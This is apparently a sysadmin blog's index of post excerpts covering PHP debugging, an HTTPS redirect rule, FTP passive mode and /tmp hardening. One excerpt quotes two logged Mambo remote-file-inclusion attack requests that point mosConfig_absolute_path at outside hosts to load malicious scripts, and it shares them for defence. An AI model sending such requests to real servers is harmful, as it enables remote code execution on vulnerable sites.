Sys Admin Guides, How To's, etc by Marios Maravelias

Ever needed to solve a matter in your php website but you could not see the errors or didn’t have access to the error_log of your vhost?

a workarround:

Read the rest of this entry »

I know that not lots of people use mambo these days, and most of them upgraded to joomla 1.5 but in case you happen to have one hosted in your server, there is a known vulnerability , hack scripts using the mosConfig_absolute_path variable to load malicious code from other webhosts ,and that gives them the ability to run scirpts (you surely dont wont) in your server.

an example is requests like the above in the access files of apache:

/CMS//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=
1&GLOBALS=mosConfig_absolute_path=http://www.rgboy.fi//spreadz.txt??

/CMS//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=
1&GLOBALS=&mosConfig_absolute_path=http://forum.redglove.it//c.txt??

securing/hardening the tmp is one thing, but wont do the job, the rules of the latest Mod Security are not easy at all to write , you have to be good in regular expressions.

What did the trick in my case is re-write rules. Read the rest of this entry »

For all of those you did upgrade Internet Explorer to latest 8.x version, I’m sure even for once you have face the “Security Warning” pop-up with “Do you want to view only the webpage content that was delivered securely?” when you used your Gmail or other accounts.

Do you want to view only the webpage content that was delivered securely?

Read the rest of this entry »

iIf you use windows server 2003 or 2008 with windows ftp you have for sure face the annoying problem when a client tries to connect to his ftp account with Passive Mode and the ftp connection just hungs, so the only way out is to tell the client to use Active Mode (if he can choose that in his ftp client program).

First of all you have to understand what is the difference between Active and Passive Mode.
Read the rest of this entry »

To redirect all http:// traffic to the corresponding https:// traffic, we make use of a bit of mod_rewrite magic.

RewriteEngine On
RewriteCond %{SERVER_PORT} 80
RewriteRule ^(.*)$ https://www.example.com/$1 [R,L]

Replace www.example.com with your own SSL URL.

To force SSL for a particular folder (not the entire site), use the following instead:
Read the rest of this entry »

After discovering scripts running in my /tmp folder (in CentOS 5.x) I had to harden the directory.

The faster way to harden your /tmp and /var/tmp without rebooting is the following:

In your /dev directory create an empty 2,5 GB file (best for web hosting servers with many websites).

# cd /dev
# dd if=/dev/zero of=tmppart bs=1024 count=2500000

We will now create an ext3 filesystem for in our tmppart file.
Read the rest of this entry »